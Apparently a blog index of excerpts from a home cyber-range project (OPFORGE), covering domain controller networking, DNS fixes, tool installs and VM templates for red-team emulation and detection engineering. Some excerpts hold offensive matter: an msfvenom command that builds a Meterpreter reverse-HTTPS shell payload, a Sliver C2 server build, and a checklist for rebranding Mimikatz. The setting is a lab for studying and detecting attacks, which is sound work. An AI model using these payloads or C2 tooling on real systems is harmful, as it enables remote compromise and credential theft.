OPFORGE Posts

OPFORGE Rebrand Checklist for Mimikatz This step-by-step guide simplifies the process of rebranding Mimikatz under the OPFORGE project. Use it to create a portfolio-grade build aligned with Threat Emulation, Detection Engineering, and Explainable AI objectives. Maintainer: Alfredo Pelaez Date: 2025-05-31 Project Alignment: OPFORGE | High-Yield Performance & Results (H.Y.P.R.) Mindset ✅ Phase 1: Clone and Prepare the Repo Clone the Mimikatz repository: git clone --recursive https://github.com/gentilkiwi/mimikatz.git Tools/mimikatz Create a backup copy: ...

Background Originally, OPF-DC01 was deployed with an IP address in the CSOCINFRA (192.168.20.0/24) subnet. However, per OPFORGE’s logical segmentation, all domain services must reside in the ADINFRA (192.168.40.0/24) segment to maintain operational and architectural integrity. Problem OPF-DC01 had IP 192.168.20.100 (incorrect subnet). The gateway was misconfigured as 192.168.50.5 (C2 CONTROL). This broke domain service accessibility and violated the subnet’s trust boundary. Solution 1. Re-IP OPF-DC01 to ADINFRA New-NetIPAddress -InterfaceAlias "Ethernet0" ` -IPAddress "192.168.40.100" ` -PrefixLength 24 ` -DefaultGateway "192.168.40.5" 2. Update DNS Set-DnsClientServerAddress -InterfaceAlias "Ethernet0" -ServerAddresses "192.168.40.100" 3. Fix Default Route Remove-NetRoute -InterfaceAlias "Ethernet0" -NextHop 192.168.50.5 New-NetRoute -InterfaceAlias "Ethernet0" ` -DestinationPrefix "0.0.0.0/0" ` -NextHop "192.168.40.5" Results OPF-DC01 now properly resides at 192.168.40.100. Routing flows through opf-fw01 via gateway 192.168.40.5. It is ready to serve domain joins from endpoints like OPF-MBR01.

🧩 Problem Summary After placing OPF-DC01 into the ADINFRA subnet (192.168.40.0/24), OPF-MBR01 was unable to resolve public domains such as google.com. DNS requests to 192.168.40.100 (the DC) failed to resolve, even though routing to the firewall was functional. 🔍 Root Cause By default, OPF-DC01 was not forwarding DNS queries to a working upstream resolver. Attempted use of public DNS forwarders like 8.8.8.8 and 1.1.1.1 failed because OPF-DC01 had no internet access in the segmented lab setup. ...

🎯 Purpose In the OPFORGE lab, Chocolatey may not be reliable due to segmented DNS or network control. Here’s how to install the full Sysinternals Suite offline to a standard lab path. 🗂️ Installation Directory All tools are installed to: C:\OPFORGE\Tools\Sysinternals This ensures consistent, reproducible builds and clean environment variables. 🛠️ Installation Steps 1. Download From a system with internet access: Invoke-WebRequest -Uri "https://download.sysinternals.com/files/SysinternalsSuite.zip" -OutFile "SysinternalsSuite.zip" 2. Transfer and Install Copy the zip to C:\OPFORGE\SysinternalsSuite.zip, then run: ...

Metasploit Installed Metasploit was installed using the official msfinstall script: curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb -o msfinstall chmod 755 msfinstall sudo ./msfinstall Confirmed with: msfconsole --version Payload Generation The following payload was created for C2 operations within the DMZRED segment: sudo msfvenom -p windows/x64/meterpreter/reverse_https \ LHOST=192.168.22.50 LPORT=8443 \ -f exe -o shell.exe Payload was moved to: /opt/opforge/redteam/payloads/shell.exe File properties: file shell.exe sha256sum shell.exe The payload is now ready to be staged from OPF-RED01 or delivered via social engineering as part of a detection validation scenario. ...

Sliver Build & Launch After cloning the Sliver repository and resolving build prerequisites (notably zip), the server was compiled successfully using: cd /opt/opforge/tools/sliver make The Sliver server was then launched: ./sliver-server Screenshot of Successful Launch This confirms the Sliver C2 is operational and ready to receive implants or generate payloads. Next Steps Launch sliver-client and test C2 communication Generate staged and unstaged payloads Begin Red Team activity with Sliver in DMZRED Monitor OPF-BLUE01/AI01 for correlated events

base-ubuntu-2204-template OS: Ubuntu 22.04 LTS Minimal Uses: Cloning source for opf-red01, opf-log01, opf-ai01, opf-cloud01 Hardened baseline with: UFW firewall SSH key-based auth Git, Python, pip pre-installed Snapshot name: Clean Install – Ready for Clone base-windows10-template OS: Windows 10 Pro 22H2 (fully patched) Uses: Cloning source for opf-mbr01, future victims Tools installed via Chocolatey: Sysmon, Winlogbeat, VSCode, Wireshark, Sysinternals Pre-Sysprep and snapshot-ready

Segments CSOCINFRA (192.168.20.0/24): Houses opf-log01 (SIEM) and opf-ai01 (ML detection) LANWORKSTATIONS (192.168.30.0/24): Contains opf-mbr01 and future endpoints DMZRED (192.168.22.0/24): Hosts attacker targets like opf-cloud01 ADINFRA (192.168.40.0/24): Supports opf-dc01 and GPO testing Example Host Assignments Host IP Address Segment opf-fw01 192.168.1.24 (WAN) pfSense router opf-dc01 192.168.40.100 ADINFRA opf-mbr01 192.168.30.101 LANWORKSTATIONS opf-red01 192.168.22.50 DMZRED opf-log01 192.168.20.12 CSOCINFRA

OPFORGE began as a minimal cyber range with SOF-ELK and basic telemetry ingest, and has evolved into a segmented, multi-role portfolio lab for red team emulation, detection engineering, and AI-enhanced threat analysis. Evolution Timeline Phase 1: Initial Sandbox Single VM (SOF-ELK) Flat network, no segmentation Manual log ingestion Phase 2: Tactical Expansion Added pfSense (opf-fw01) Introduced segmentation: CSOCINFRA, DMZRED, LANWORKSTATIONS, ADINFRA First red team emulation with opf-red01 Winlogbeat and Sysmon on endpoints Phase 3: Professionalization Cloned base templates (base-ubuntu-2204-template, base-windows10-template) VM-specific roles: opf-ai01, opf-log01, opf-mbr01, etc. AI and ML integration via Jupyter (opf-ai01) Multi-tiered ingest pipeline (Zeek → Logstash → OpenSearch) Lessons Learned Legacy OS images break modern tools Cloning base templates improves consistency Network segmentation is essential for realistic detection engineering

🧱 Base Templates Used in OPFORGE This post outlines the two core VM templates used to clone all OPFORGE lab components. Each template is hardened, snapshot-ready, and optimized for its role. 🐧 base-ubuntu-2204-template OS: Ubuntu 22.04 LTS (minimal ISO) Usage: Source image for all Linux-based OPFORGE components Configured With: SSH key-based authentication ufw firewall rules Preinstalled: Git, Python3, pip, htop, curl, net-tools Snapshot Label: ubuntu2204-clean-template 🪟 base-windows10-template OS: Windows 10 Pro 22H2 (fully patched) Usage: Source image for domain-joined endpoints Configured With: Tools installed via Install-OPFORGE-WindowsTools.ps1: Sysmon, Winlogbeat, 7zip, VSCode, Sysinternals, Wireshark Bloatware removal and telemetry disabled Power settings and Start menu cleaned Snapshot Label: win10_22H2_tools_installed Both templates are used to ensure consistency, repeatability, and portfolio-quality documentation across the OPFORGE environment. ...